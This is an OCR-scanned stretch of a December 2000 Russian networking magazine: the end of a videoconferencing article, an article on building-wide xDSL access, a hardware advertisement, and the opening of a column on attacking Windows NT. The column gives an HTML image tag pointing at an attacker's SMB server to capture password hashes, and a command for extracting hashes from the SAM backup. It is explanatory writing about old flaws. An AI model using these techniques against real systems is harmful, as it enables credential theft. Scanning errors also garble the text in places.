сети, в частности в PowWow).
Принцип функционирования доски
заключается в том, что участники кон-
ференции могут рисовать на некоторой
общей для всех области экрана или по-
мещать туда документы (в электронной
форме). Один из типичных примеров
применения общей доски — совместное
внесение корректив в какие-либо доку-
менты. Участники конференции выде-
ляют или вычеркивают какие-то слова
или фразы, подправляют цифры и т. д„
а по окончании все стороны получают
одинаковые варианты «черновиков» и
имеют возможность сравнить с ней
принятый в итоге документ.
Кстати, одно любопытное программ-
но-аппаратное решение (уже демонст-
рировавшееся на отечественных вы-
ставках) позволяет писать или рисовать
маркером на материальной (специаль-
ной, конечно) доске, подключенной к
компьютеру, а все изображенное па ней
адекватно отражается на мониторе. Ес-
ли это решение интегрировать с систе-
мой видеоконференц-связи, то возмож-
ности проведения распределенных со-
вещаний расширятся. Еще раз напом-
ним - такие функции не являются
стандартными и могут быть по-разному
реализованы (или не реализованы) в
соответствующем программном обеспе-
чении. Но так или иначе, главное то, что
технические средства в целом позволя-
ют строить па базе видеоконференций
платформы коллективной работы и
обеспечивают намного больше преиму-
ществ, чем эффект личного присутствия.
В общем и целом можно видеть, что
спектр основных и дополнительных
возможностей систем видеоконферен-
ций очень широк, и выбор «кирпичи-
ков» оптимального как с технической,
так и экономической сторон решения
весьма разнообразен. А, кроме того,
имеющиеся решения обеспечивают до-
статочную масштабируемость.
ЗАКЛЮЧЕНИЕ
Несмотря на то что темпы роста ви-
деотрафика в сетях заметно ниже
прогнозируемых энтузиастами (и за-
интересованными в спросе па пропу-
скную способность производителями
сетевого оборудования), со временем
в статистике по видам трафика он не-
избежно займет вполне осязаемую
долю. Конечно, видеоконференц-
связь в обозримом будущем не может
претендовать на столь же высокую
значимость, как передача данных и
голоса, — ей пока что суждена роль
узкоспециального решения. Но спрос
на видеоконференции характеризует-
ся стабильностью и уверенным рос-
том, а если услуги по организации ви-
деоконференций станут неотъемле-
мой частью операторского бизнеса, то
производители и провайдеры соот-
ветствующих решений получат хоро-
ший стимул для дальнейшего техно-
логического развития и повышения
доступности. LAN
Александр Авдуевский — обозреватель
LAN. С ним можно связаться по адресу:
shura@lanmag.ru.
> http://www.lanmag.ru
Декабрь 2000 81
>НОВЫЕ ТЕХНОЛОГИИ:
— на этот раз речь идет не о разработ-
ке новой разновидности xDSL, а о
xDSL: революция
продолжается
Сергеи
овременное революционное раз-
витие Internet идет в направле-
нии создания полностью интера-
ктивной мультимедийной высокоско-
ростной коммуникационной сети. Се-
годня подключение к высокоскорост-
ной сети передачи данных становится
необходимостью для пользователей
во всем мире, причем не только ком-
мерческих, но и частных. Со временем
высокоскоростные соединения долж-
ны стать непременным условием су-
ществования общества, столь же обы-
денным, как электричество или водо-
провод.
Производители и провайдеры про-
являют достаточно большую актив-
ность в области использования мсд-
ного телефонного кабеля и техноло-
гий xDSL. При этом их деятельность
развивается в двух направлениях. С
одной стороны, высокоскоростное
подключение может быть предложе-
но отдельным пользователям, кото-
рые испытывают потребность в таком
подключении и готовы за него пла-
тить, по телефонным линиям этих
абонентов. С другой — высокоскоро-
стное подключение может быть орга-
низовано для группы потенциальных
пользователей (например, в офисном
или жилом здании), которым затем
предлагается стать абонентами дан-
ной услуги.
Оба направления, каждое из кото-
рых имеет свои достоинства и недос-
татки, имеют право па существование.
Рынок индивидуальных услуг уже
Шаронин
сформировался и постоянно расши-
ряется. В этой области лидирует тех-
нология ADSL; ожидается бурное раз-
витие повой, стандартизованной вер-
сии SDSL (ETSI ТМ6). Между тем
рынок коллективных услуг только на-
чинает формироваться, опираясь на
достижения своего «старшего брата».
Но его развитие происходит столь
стремительно, что напоминает рево-
люцию. Все объясняется очень просто
— налицо революционная ситуация
вследствие конфликта между возмож-
ностями и проблемами внедрения
технологии ADSL, с одной стороны, и
обстановкой, сложившейся на рынке,
с другой. Есть и еще одно объяснение
принципиально ином подходе к ис-
пользованию уже имеющихся.
ЧТО ХОРОШО
У ADSL много привлекательных дос-
тоинств. Прежде всего, это высокая
скорость передачи данных. Функцио-
нальным пределом возможностей
ADSL является абонентская линия
протяженностью 3,5— 5,5 км при тол-
щине проводов 0,5 мм. В настоящее
время ADSL обеспечивает скорость
«прямого» потока данных (от провай-
дера к абоненту) в пределах от 1,5 до 8
Мбит/с и скорость «обратного» пото-
ка данных (от абонента к провайдеру)
от 640 Кбит/с до 1 Мбит/с. В соответ-
ствии с общей тенденцией развития
данной технологии в будущем ско-
рость передачи данных, особенно в
«прямом» направлении, увеличится.
Чтобы подключиться к сети
Internet или к локальной сети, больше
не нужно набирать телефонный но-
мер. ADSL создает широкополосный
канал передачи данных по уже суще-
ствующей телефонной линии. После
подключения модемов ADSL пользо-
ватель получает постоянно готовое к
работе соединение (см. Рисунок 1).
В результате вся пропускная спо-
собность оказывается в распоряжении
пользователя. В отличие от кабель-
ных модемов, где пропускная способ-
ность разделяется между всеми або-
82 LAN/Журнал сетевых решений
> НОВЫЕ ТЕХНОЛОГИИ:
нентами (что оказывает существенное
влияние на скорость передачи дан-
ных), технология ADSL предусматри-
вает использование линии только од-
ним пользователем.
Технология ADSL позволяет пол-
ностью задействовать возможности
линии. При обычной телефонной свя-
зи «в работе» оказывается около од-
ной сотой пропускной способности
телефонной линии. Технология ADSL
устраняет этот «недостаток» — остав-
шиеся 99% задействуются теперь для
высокоскоростной передачи данных.
Многофункциональность данной
системы также обеспечивает сущест-
венные преимущества. Так как для
различных функций выделены свои
частотные каналы абонентской ли-
нии, ADSL позволяет одновременно
передавать данные и говорить по те-
лефону. В результате абонент может
звонить по телефону, отвечать па
звонки, передавать и принимать фак-
сы, одновременно находясь в Internet
или получая данные из локальной се-
ти, и все это осуществляется по одной
и той же телефонной линии.
ADSL открывает совершенно но-
вые возможности там, где в режиме
реального времени требуется переда-
ча качественного видеосигнала. Это,
например, организация видеоконфе-
ренций, обучение на расстоянии и ви-
део по запросу. Технология ADSL по-
зволяет провайдерам и телефонным
компаниям предоставлять своим
пользователям услуги со-скоростью
передачи данных, более чем в юо раз
превышающей обеспечиваемую са-
мым быстрым на сегодня аналоговым
модемом (56 Кбит/с) и более чем в 70
раз выше скорости передачи данных в
ISDN (128 Кбит/с).
Кроме того, технология ADSL
чрезвычайно эффективна с экономи-
ческой точки зрения хотя бы потому,
что она не требует прокладки специ-
альных кабелей и позволяет задейст-
вовать уже существующие двухпро-
водные медные телефонные линии.
Таким образом, если у вас дома или в
офисе есть подключенный телефон-
ный аппарат, то вам не нужно прокла-
дывать дополнительные провода, что-
бы применять ADSL. На обоих концах
линии устанавливаются модемы
ADSL: один на стороне пользователя
Рисунок 1. Использование ADSL для доступа в Internet.
(дома или в офисе), а другой — на сто-
роне сети (у провайдера Internet или
на телефонной станции). Кроме того,
чтобы модем ADSL работал, пользо-
вателю необходимо иметь компьютер
и интерфейсную плату, например
Ethernet toBaseT.
Еще одно немаловажное достоин-
ство ADSL — эта технология предла-
гает экономичный способ передачи
постоянно растущего потока данных
из домов и небольших офисов. Высо-
кая скорость «прямого» потока дан-
ных и постоянная готовность к рабо-
те — вот основные преимущества, ко-
торые получает пользователь, вы-
бравший для себя технологию ADSL.
Возможность одновременного ис-
пользования телефона и компьютера
без второй соединительной линии
также немаловажна. Кроме того, пе-
речисленные характеристики позво-
ляют применять ADSL для дистанци-
онного обучения, интерактивных игр
и т. п.
Соединение ADSL «всегда устано-
влено», поэтому все сообщения по-
ступают без задержки. Постоянно
действующее соединение значитель-
но упрощает работу. Технические ха-
рактеристики при этом также значи-
тельно улучшаются, потому что высо-
кая скорость позволяет снизить вре-
мя ожидания и участвовать в таких
мероприятиях, как, например, видео-
конференции.
К настоящему' времени накоплен
достаточный опыт применения ADSL
— еще один аргумент в пользу данной
технологии. Конечно, этим опытом
обладают не все. Но сегодня провай-
дер вполне может найти компанию-
поставщика, хорошо знакомую с аспе-
ктами построения и эксплуатации та-
ких систем. Это лишь одна сторона
вопроса. Что еще важнее, немалый
опыт накоплен также и производите-
лями. Дело в том, что на Западе круп-
ные рамочные контракты на поставку
оборудования операторам заключают-
ся только после того, как оператор по-
лучит положительное заключение от
серьезной исследовательской лабора-
тории (например, Bell Labs в США) и
проведет опытную эксплуатацию (в
течение 6—12 месяцев). Как во время
испытаний, так и в ходе эксплуатации
оборудование проходит проверку на
устойчивость работы и совместимость
со всеми системами оператора. Все
> http://www.lanmag.ru
Декабрь 2000 83
> НОВЫЕ ТЕХНОЛОГИИ:
Рисунок 2. Использование выносного мультиплексора доступа xDSL.
полученные замечания производи-
тель устраняет — иначе ему контракта
не видать. Поскольку производитель
одновременно занимается нескольки-
ми контрактами, то оборудование че-
рез несколько поколений доводится
практически до совершенства. Так,
уже имеющиеся проверенные реше-
ния plug&play для провайдеров
Internet на основе IP DSLAM позво-
ляют с минимальными затратами мо-
дернизировать существующие или по-
строить новые сети IP, задействуя
технологию ADSL для абонентского
доступа.
ЧТО плохо
Однако возможность использования
технологии ADSL во многом зависит
от качества конкретной телефонной
линии. Чтобы результаты удовлетво-
рили любого, даже самого придирчи-
вого пользователя, абонентскую ли-
нию необходимо предварительно под-
готовить к эксплуатации.
Новые цифровые технологии
предъявляют повышенные требова-
ния к кабельной сети. Эти требова-
ния, прежде всего, касаются качества
линии и определяются возможностя-
ми ее использования для высокоско-
ростной передачи данных. Обычная
витая пара телефонных проводов, по
которой до этого не передавалось ни-
чего, кроме голоса, в своем реальном
состоянии может не подходить для
высокоскоростной передачи сигналов
цифровых систем.
Технология ADSL весьма чувстви-
тельна и к длине используемой ли-
нии. Пропускная способность линии
ADSL обратно пропорциональна про-
тяженности абонентской линии. На
функционирование такой линии ока-
зывают влияние реальная длина кабе-
ля, диаметр проводов, наличие ка-
бельных отводов, а также перекрест-
ные помехи от других пар кабеля. Под
кабельным отводом обычно понима-
ется отрезок кабеля, который подклю-
чен к абонентской линии, но не вхо-
дит в прямое соединение абонента с
телефонной станцией. Осуществле-
нию обычной телефонной связи ка-
бельные отводы не мешают. Однако
для цифровых технологий, таких, как
ADSL, кабельные отводы могут созда-
вать различные проблемы. Отражен-
ные от концов кабельных отводов сиг-
налы накладываются на передавае-
мый абоненту сигнал, в результате че-
го растет число ошибок.
Кроме того, технология ADSL
(впрочем, как и другие цифровые тех-
нологии) весьма чувствительна к на-
личию сильных перекрестных помех
между используемой парой проводов
и другими парами, входящими в тот
же пучок кабеля. Одной из основных
причин появления перекрестных по-
мех являются «разбитые» пары (пере-
путанные между собой провода двух
пар) в кабеле.
Технология ADSL позволяет удов-
летворить спрос со стороны пользо-
вателей на высокоскоростные систе-
мы передачи голоса, данных и видео
по телефонным проводам. Но, разви-
вая свой бизнес в данном направле-
нии, любой провайдер или телефон-
ная компания неизбежно столкнется
с двумя «пакетами» трудностей. Пер-
вый «пакет» включает описанные вы-
ше трудности технического характе-
ра. Для организации высокоскорост-
ного доступа каждого индивидуаль-
ного пользователя его телефонную
линию необходимо тщательно подго-
товить и осуществлять постоянный
контроль за ее техническим состоя-
нием. Теперь если соответствующие
расходы умножить на количество по-
тенциальных пользователей у любой
серьезной компании, то итоговая сум-
ма будет весьма значительной. Вто-
рой «пакет» проблем относится к
маркетингу. Чтобы постоянно увели-
чивать количество пользователей, с
ними придется работать. Каждого,
кто проявляет хоть малейший инте-
рес к высокоскоростным соединени-
ям, нужно убедить в необходимости
превращения его телефонной линии в
высокоскоростной канал. При этом
многим пользователям, которых уже
не устраивает скорость передачи ана-
логового модема, тем не менее не
нужна столь высокая скорость пере-
дачи данных, которую в состоянии
обеспечить технология ADSL (да и
экономические соображения нельзя
не принимать в расчет).
ВОПРОСЫ И ОТВЕТЫ
Конкуренция, как известно, — двига-
тель прогресса. Трудно что-либо про-
тивопоставить этому утверждению.
Но именно конкуренции нам и не
84 LAN/Журнал сетевых решений
> НОВЫЕ ТЕХНОЛОГИИ:
хватает во .многих областях производ-
ства, так же как и в сфере услуг. А уж
как ее ие хватает в области услуг свя-
зи... Стремительное падение цен и по-
явление новых видов услуг в области
сотовой связи и пейджинга — резуль-
тат конкуренции между операторами.
А много ли пользы принесла конку-
ренция в области проводной связи?
Да и существует ли она вообще?
Зная, что абонентские шлейфы нахо-
дятся в руках городской телефонной
сети, вряд ли на этот вопрос можно
ответить утвердительно. Все альтер-
нативные операторы вынуждены ид-
ти на поклон, чтобы организовать
подключение абонента. Нет, конечно,
все альтернативные операторы имеют
точки присутствия на узлах связи. Но
ведь они размещены и существуют
там не на законном основании (как в
США, например), а по милости адми-
нистрации сети. А у монархов ведь
как? Слово королевское: захотел —
дал, захотел — назад взял. Какая уж
тут конкуренция...
Особенно тяжело взаимоотноше-
ния складываются между традицион-
ными операторами и теми, кто зани-
мается услугами доступа к сетям пе-
редачи данных и Internet. Даже в
США традиционные операторы и
операторы альтернативные «общают-
ся» между собой не без проблем. Пос-
ледние платят первым и за место для
оборудования, и за использование
шлейфов. Взаиморасчеты произво-
дятся по неким «расчетным» ценам,
которые традиционные операторы
стараются взвинтить под любым
предлогом. И что же? Да как обычно:
конкуренция и здесь все поставила на
свои места. Решение, когда есть пла-
тежный спрос, всегда найдется. На
помощь пришли производители с но-
вым приложением xDSL. Революция
продолжается!
Идея лежала на поверхности: отка-
заться от использования «последней
мили», принадлежащей традиционно-
му оператору, и перейти к использо-
ванию последней сотни метров, кото-
рые обычно принадлежат зданию. А
дома в городах какие? Многоквартир-
ные. Да и офисные комплексы чаще
всего напоминают те же многоквар-
тирные дома. А гостиницы? А круп-
ные компании? Ниже приведены не-
сколько вопросов, ответы на которые
напрашиваются сами собой.
1. Зачем платить оператору за уста-
новку на его узле оборудования, ес-
ли его можно установить в доме, а
абонентов подключить к нему, ис-
пользовав медь, принадлежащую
зданию?
2. Зачем платить оператору за медь,
необходимую для обслуживания
ста жильцов, если ему достаточно
заплатить за две пары (основную и
резервную)? А ведь доставить до
дома информацию можно и по ра-
диоканалу.
3. Зачем агитировать «прописанных»
в здании абонентов — достаточно
заручиться поддержкой хозяина
дома, поделившись с ним частью
прибыли от оплаты за услуги?
Кстати, жильцы не проиграют — им
не придется заказывать и дожи-
даться установки оборудования, а
также платить за нее.
4. Зачем стараться обеспечить высо-
кое качество весьма длинного про-
вода от узла связи до здания — до-
статочно держать под контролем
небольшой отрезок от ввода в зда-
ние до абонента. А это, в свою оче-
редь, позволяет увеличить ско-
рость и обойтись низкокачествен-
ными шлейфами. Мало того, что
точка концентрации трафика при-
близилась к конечному пользова-
телю и эффективность использова-
ния канала возросла. Данное реше-
ние обеспечивает еще один источ-
ник экономии — ведь на кондицио-
нирование меди теперь не нужно
тратиться вовсе. На таких расстоя-
ниях все должно работать даже по
шлейфу из ТРИ (по так называе-
мой «лапше»).
Итак, зная ответы, предложить ре-
шение, соответствующее всем исход-
ным условиям, не составит труда (см.
Рисунок 2). В основе этого решения
все те же технологии xDSL. Все так
же абонентские шлейфы используют-
ся как для телефонии, так и для пере-
дачи данных. Зато покрываемые рас-
стояния сократились, и теперь впол-
не можно обойтись без частотных
разделителей, подключая оконечные
устройства передачи данных парал-
лельно в любом удобном месте. Все
просто.
Рисунок 3. Сетевая плата xDSL.
Рисунок 4. Конвертер USB - xDSL.
Здесь стоит сделать небольшое от-
ступление. К сожалению, далеко не
везде в России вышеупомянутые ис-
ходные условия выполняются.
Во-первых, сам принцип органи-
зации кабельной сети в здании у нас
иной. Обычно здание не имеет одной
точки ввода — в него входит несколь-
ко десяти- или двадцатипарных кабе-
лей. Кабели эти оканчиваются короб-
ками, разбросанными достаточно ха-
отично в подъездах, и от них уже
идут абонентские шлейфы в виде
проводов ТРП. Начинаются же они,
как правило, в кроссовом шкафу на
улице.
Во-вторых, точкой разграничения
оператор-абонент является не ввод в
здание, а как раз упомянутые выше
коробки. Все это достаточно условно,
так как в наших законах об этих раз-
граничениях ничего не говорится, но
одно можно утверждать с уверенно-
стью — весь кабель, включая коробки,
принадлежит городской сети.
> http://www.lanmag.ru
Декабрь 2000 85
> НОВЫЕ ТЕХНОЛОГИИ:
Рисунок 5. Конвертер lOBaseT-xDSL.
Рисунок 6. Выносной мультиплексор xDSL.
В-третьих, у большинства зда-
ний, к сожалению, нет одного хозя-
ина. Точнее говоря, хозяин-то есть
(ДЭЗ или еще что-то в этом роде),
но ему не до высоких технологий,
там только и успевают выбитые сте-
кла вставлять.
В заключение (чтобы у читателя
не создалось впечатление, что «слад-
кая жизнь, как всегда, проходит ми-
мо») следует отметить, что для зда-
ний с наиболее платежеспособными
абонентами (новое качественное жи-
лье и офисные комплексы) все на-
чальные допущения верны. И число
таких зданий растет на глазах, так что
перспективы для внедрения нового
оборудования в России все-таки име-
ются немалые.
Но вернемся к нашей теме. Вот ал-
горитм действия альтернативного
оператора сетей передачи данных:
• составление списка зданий, у кото-
рых имеется один хозяин (включа-
ем в него офисные комплексы,
крупные компании, коттеджные
поселки и т. п.);
• заключение с хозяином договора па
предоставление услуг (если здание
только вводится в эксплуатацию,
то лучше эксклюзивный) и опреде-
ление размеров его дилерского воз-
награждения;
• установка оборудования в цент-
ральной кроссовой;
• организация любого выделенного
канала от своего узла до здания
(радио, выделенная линия, арендо-
ванный у другого оператора канал);
• подключение абонентов и получе-
ние прибыли.
Оператору выгодно. Но и две дру-
гие стороны не прогадают. Жильцы и
арендаторы могут меняться, но любо-
му новому пользователю будет проще
и дешевле получить услугу от хозяина
здания. А хозяин здания может не
только получать вознаграждение, по и
всегда упоминать о возможности пре-
доставления такой услуги, как бонусе,
для арендатора.
Говорят, за двумя зайцами пого-
нишься, ни одного не поймаешь. Но
давайте немного отвлечемся от темы
нашего разговора. Подумайте, готовы
ли вы подключиться к спутниковому
телевидению, оплатив и тарелку, и ус-
тановку всего оборудования, да еще и
вносить регулярно абонентную плату
за пакет программ без какой-либо га-
рантии, что установленная на балконе
тарелка будет обеспечивать хороший
прием. А если тарелка уже окажется
установлена на крыше и к каждой
квартире уже будет протянут кабель,
так что вам останется только приобре-
сти дешифратор и вносить абонент-
скую плату? Мне кажется, в послед-
нем случае спутниковое телевидение
появилось бы во многих квартирах.
Да и компании, предоставляющей
данную услугу, гораздо легче и дешев-
ле установить и настроить одну ан-
тенну для каждого дома, чем делать
это для каждого отдельного клиента.
Вывод прост. Если уж информаци-
онный мир рано или поздно вторгнет-
ся в жизнь каждого человека, то опе-
ратору следует рискнуть «сыграть на
опережение» и подготовить почву для
подключения всех потенциальных
пользователей. Все, что требуется, —
обеспечить высокоскоростное под-
ключение каждого здания, с большим
количеством потенциальных пользо-
вателей, с помощью одной (или, в
крайнем случае, нескольких) линий
передачи данных. При этом оба зайца
окажутся у вас. Количество линий,
которые необходимо специально под-
готовить к высокоскоростной переда-
че данных, значительно сократится, а
число потенциальных пользователей
— заметно увеличится.
Собственно говоря, в США, где, в
отличие от России, нет проблем с ли-
цензированием операторской дея-
тельности, еще одним аргументом в
пользу рассматриваемого подхода
стало повсеместное вовлечение в про-
цесс продажи услуг связи хозяев зда-
ПОСЕТИТЕ: www.rosco.ru
ПИШИТЕ: rosco@rosco.ru
s 795-04-00
ПОСТРОЙ I"
КОМПЬЮТЕРНАЯ КОМПАНИЯ
предлагает оборудование со склада в Москве
mtioteduVID СЕТЬ
Концентраторы . 10/1 0 0TX
Compex DualSpecd Hub DX2216
Compex DualSpeed Hub DX2224
Compex DualSpeed Hub RX22O8SA
от $205
от $235
___...______r________________ otS87
Compex DualSpeed Hub MX2208SA' ot$1 14
Compcx DualSpccd Hub MX2216SB* ot$189
ISDN/VPN
Коммутаторы 10/10 ОТХ FullDuplox
Compex Web Manageable Switch SXP1216WM-A’
Compox Web Manageable Switch SXP1224WM-A
Compex Manageable Gigabit Switch SGX3224
Compcx Manageable Gigabit Switch SGX3224 Plus*
Compex MinrSwitch PS2208A
Compcx Switch SXP..1216A’. -
Compex Switch SRX 1224*. • '
от$407
от $509
от$1053 .
от $1389 .
£от$102А
•от$404
ISDN/VPN
COMPEX
1 ер'*^*^’****^ networks@work
.______ И ОПТОВАЯ ТОРГОВЛЯ
ihT—- Работаем без выходных:
ВыСОКОСКОр£§^Й*------------Торговый зал РОСКО, (м, Динамо) ул. Юнатов, 18. Тел.: 212-7833
ТВЦ Торбушхнн двор" (м. Багратионовская) ул. Барклая, 8, пав. 217. Тел.: 231-4906
ВКЦ 'Савеловский", (и. Савеловская) ул. Сущовскнй вал, 5, пав. В44 и Е4. Тел.: 784-6488.
ТВЦ "Радиомир", (м. Люблино) ул. Краснодарская, 118, магазин М1. Тел.: 359-8233.
Авторизованные партнеры Compex: АБН (095)755-8813; Апьтаир-Иифосиствм (095)289-7524; Иитернет мммим'ww.dottiMie.ni' 784-7175; 1СТ(095)426-2703; Вязард (095)2344)161; Инфорсер (095)1774798; Квест (095)973-4960; НИКС (095)974-3333;
Альянс (095)796-9356; Корвет (095)365-4387; Лязард (095)193-5363.193-5336; Коипьюлинх (095)737-8855; ОЛДИ (095)232-3009,178-9044; R-Style (095)904-1001; Сетевая лаборатория (095)784-6490,755-9370; Техморкот Компьютере (095)723-8130. «-Центр (095) 472-6401.
86 LAN/Журнал сетевых решений
> НОВЫЕ ТЕХНОЛОГИИ:
ний в качестве розничного сегмента.
И тут возможность для экономии на-
лицо — хозяин здания и так каждый
месяц выставляет счета арендаторам,
так что ему стоит вписать в счет еще
одну строку. А оплата доступа, по
большей части, ведется по принципу
фиксированного тарифа за постоян-
ное подключение. Подключение к
Internet многоквартирных жилых до-
мов может стать еще одной комму-
нальной услугой, вроде газо- и водо-
снабжения, отопления и электричест-
ва. Подготовить дом к нормальной ра-
боте в сети — это значит организовать
высокоскоростной канал передачи
данных со всей необходимой инфра-
структурой, сетью, оперативными и
сервисными функциями.
В результате цепочка продажи ус-
луг выглядит так: поставщик услуг —
оператор транспортной сети — опера-
тор сети доступа — хозяин здания (он
же дилер или розничный торговец) —
абонент. Причем в большинстве слу-
чаев вполне можно обойтись и без
оператора сети доступа.
Что же представляет собой необхо-
димое для этого оборудование? Цент-
ральная часть — мультиплексор дос-
тупа, по внешнему виду напоминаю-
щий обычный концентратор локаль-
ной сети. Абонентская часть может
выглядеть по-разному, в зависимости
от приложения. В случаях, когда речь
идет о доступе для одного компьюте-
ра, — это сетевая плата (см. Рисунок
3). Если требуется подключить порта-
тивный компьютер или обеспечить
универсальный стык (например, в
гостиницах) — это адаптер с интер-
фейсом USB (см. Рисунок 4). Когда
же нужно обеспечить доступ для сег-
мента локальной сети — это специаль-
ный концентратор (см. Рисунок 5).
Подключение оборудования осу-
ществляется чрезвычайно просто.
Мультиплексор доступа (см. Рисунок
6) устанавливается рядом с централь-
ным кроссом здания и подсоединяет-
ся в параллель к абонентским шлей-
фам; абонентское устройство включа-
ется в любую из телефонных розеток,
имеющихся в помещении арендатора.
Никаких частотных разделителей,
микрофильтров и замены проводов —
используется имеющаяся телефонная
проводка. В зависимости от модели
мультиплексора на абонентском
шлейфе (до 24 портов) обеспечивает-
ся скорость доступа от 1 до ю Мбит/с
при дальности около 500 м, в качест-
ве интерфейса глобальной сети ис-
пользуется Ethernet на ю/юо Мбит/с
или Fast Ethernet на 200 Мбит/с.
Мультиплексоры поддерживают раз-
личные способы удаленного админи-
стрирования (SNMP, telnet'), несколь-
ко схем биллинга (оплата за время
доступа, за трафик, постоянная) со
сбором информации с удаленного
сервера, управление основными пара-
метрами (CIR, MIR) качества сервиса
(QoS) для каждого клиента, а также
возможность задействования канала
для передачи трафика VoIP коммер-
ческого качества.
Такие характеристики позволяют
провайдеру подключить к своей сети
передачи данных всех арендаторов,
организовав всего одну точку присут-
ствия в здании. Учитывая, что стои-
мость порта у подобных систем ниже,
чем у обычного xDSL, достигаемая
экономия позволяет сторонникам но-
вой технологии с уверенностью смот-
реть в будущее и всерьез рассчиты-
вать на захват существенной доли
рынка систем цифрового абонентско-
го доступа.
Обеспечение высокоскоростного
доступа индивидуальных абонентов
представляет собой быстро развива-
ющийся рынок услуг, за которым
пристально следят не только про-
вайдеры, по и производители теле-
коммуникационного оборудования.
Главная цель состоит в охвате двух
основных сегментов данного рынка
— офисных зданий и многоквартир-
ных жилых домов. Для решения дан-
ной задачи используются различные
методы, в частности подключение
отдельных абонентов с помощью
технологий xDSL. Но до сегодняш-
него дня не было придумано техни-
ческого решения, реализация кото-
рого позволила бы организовать си-
стему обслуживания, приносящую
прибыль за счет массового привле-
чения потенциальных пользовате-
лей. Организация высокоскоростно-
го доступа не для каждого пользова-
теля в отдельности, а для целого до-
ма создает совершенно новую мо-
дель обслуживания и значительно
расширяет возможности провайде-
ров и телефонных компаний. Те-
перь эта технология есть, и опа ак-
тивно апробируется, так что — про-
должение следует. LAN
Сергей Шаронин — сотрудник компании
«СвязьКомплект». С ним можно свя-
заться по адресу: shar@skomplekt.com и
http://www.skomplekt.com.
> http://www.lanmag.ru
Декабрь 2000 87
> ЗАЩИТА ИНФОРМАЦИИ:
Крис Касперски
Атака на Windows NT
ели первые кирпичи здания UNIX
закладывались в ту далекую эпо-
ху, когда никакой теории безопас-
ности еще не существовало, то
Windows NT изначально проектирова-
лась как. защищенная, отказоустойчи-
вая система.
Дейв Катлер, крестный отец
Windows NT, ранее принимавший
участие в создании двух «легенд» се-
мидесятых — RSX-nM и VMS, вло-
жил в NT весь свой талант и опыт,
но... похоже, потерпел фиаско. (Кста-
ти, позволю себе каламбур: если в аб-
бревиатуре «VMS» все буквы сдви-
нуть на одну позицию вправо, то по-
лучится «WNT».) Да, Windows NT
построена на передовых технологиях
и основана па внутренне непротиво-
речивой модели безопасности, но
идиллию разрушают вездесущие
ошибки реализации.
Кроме досадных багов, своеобразных
программистских описок, исправить ко-
торые можно с помощью очередной за-
платки, множество проблем порождает
несогласованная стыковка различных
компонентов операционной системы
друг с другом, способная значительно
ослабить общий уровень защищенности
системы. Но ни один человек не в состо-
янии удержать в голове миллионы
строк исходного кода операционной си-
стемы, а с ростом количества разработ-
чиков координировать их действия ста-
новится все сложнее и сложнее.
Неудивительно, что в Windows NT
выявлены серьезные бреши в защите,
причем злоумышленник может повы-
сить уровень своих привилегий от «гос-
тя» до администратора. Часть ошибок
устраняется правильным администри-
рованием (читай — всяческим ущемле-
нием прав пользователей и отключени-
ем всего, что удается отключить), но са-
ма архитектура Windows NT всегда ос-
тавляет злоумышленнику шанс про-
никнуть в систему.
Аналогично UNIX, операционная
система Windows NT подвержена уг-
розе переполнения стека, а также выхо-
да за пределы процесса, в результате
чего пользователь может получить дос-
туп к данным и коду другого приложе-
ния (включая системные сервисы).
Кроме того, реализация протоколов се-
мейства TCP/IP оставляет желать луч-
шего и допускает возможность удален-
ной атаки.
Впрочем, ошибки в практике про-
граммистов — дело привычное, и
встречаются они не только у
Microsoft. Однако Microsoft выпус-
кает все новые и новые версии своей
ОС, в результате они появляются за-
долго до того, как разработчики успе-
вают выявить и устранить недостатки
старых.
ПРОЩЕ ПРОСТОГО
Для проникновения в систему зло-
умышленнику вовсе не обязательно
подбирать пароль — одна нелепая
ошибка позволяет быстро, незаметно и
с гарантией на успех похитить его у
жертвы. На страничку Web достаточно
поместить ссылку наподобие <IMG
SRC=file:////my.own.smb.server/mypet.jpg>
и дождаться, пока жертва не вздумает
на нее зайти (или, чтобы ускорить раз-
вязку, послать жертве письмо в форма-
те HTML). Когда это наконец произой-
дет, Internet Explorer или Netscape
Navigator автоматически, не запраши-
вая подтверждения, передаст имя поль-
зователя и хэш-значение пароля, под
которым тот вошел в систему.
Впервые этот казус обнаружил Аа-
рон Спэнглер, а вслед за ним на него об-
ратили внимание и другие. Уязвимы
оказались все версии Windows NT 3.5—
4.0 вплоть до последних Service Pack, а
также Windows 95 и Windows for
Workgroups.
88 LAN/Журнал сетевых решений
> ЗАЩИТА ИНФОРМАЦИИ:
Но это не единственный способ не-
санкционированного вторжения. В
Windows NT наличествует так называ-
емый гостевой вход (Guest Account) с
пустым паролем. На сервере он по
умолчанию заблокирован, а на рабочих
станциях открыт! Однако получение
доступа к узлу сети, пускай на правах
гостя, — это уже происшествие, а вход в
систему с привилегиями администрато-
ра — настоящая катастрофа.
Разумеется, на рабочей станции
пароль администратора не хранится.
Собственно, в Windows NT пароли
вообще нигде не хранятся. Вместо
этого в базу данных SAM (Security
Account Manager) заносятся хэш-
значения паролей. Сама база хранит-
ся в файле %SystemRoot%\SYS-
TEM32\CONFIG\SAM, доступ к которо-
му закрыт системой. Файл SAM пред-
ставляет собой ветвь реестра
HKEY_LOCAL_MACHINE\SECURITY\SAM,
права на чтение которого предостав-
ляются только администратору (и то
по умолчанию они заблокированы).
Функции API, манипулирующие
именами пользователя и хэш-значе-
нием, недоступны непривилегиро-
ванным пользователям. Словом, за-
щита выглядит на первый взгляд бе-
зупречной и неприступной.
Между тем резервная копия сис-
темы, хранящаяся в каталоге
%SystemRoot%\Repair, в любое время
доступна каждому члену группы
Everyone (в Windows 2000 это упу-
щение уже исправлено)! Резервная
копия создается при установке (или
переустановке) Windows NT, а так-
же всякий раз при запуске утилиты
rdisk с ключом /s. Распаковав файл с
помощью команды expand sam._ sam
(резервная копия хранится в упако-
ванном виде), злоумышленник смо-
жет извлечь из него имена пользова-
телей и хэш-значения паролей.
Конечно, самих паролей в базе не
будет, но для удаленной регистрации
они и не нужны! Поэтому злоумыш-
леннику без труда удастся подклю-
читься к серверу. И если на нем ока-
жется свежая резервная копия файла
SAM с действующим паролем админи-
стратора, то... Вообще-то, опытный ад-
министратор заранее отключит все гос-
тевые выходы и уничтожит резервные
копии (либо лишит пользователей
Среди грязного белья
Мусорные баки и корзины издавна служи-
ли источником ценной информации. И,
копаясь в корзине для мусора Windows NT,
злоумышленник также может извлечь на свет
документ, содержащий конфиденциальные
данные.
Поэтому в Windows NT существует воз-
можность предоставления каждому пользо-
вателю своей собственной корзины. В обыч-
ной ситуации никакой пользователь не мо-
жет получить доступ к чужой корзине, если
он не обладает правами администратора. Но
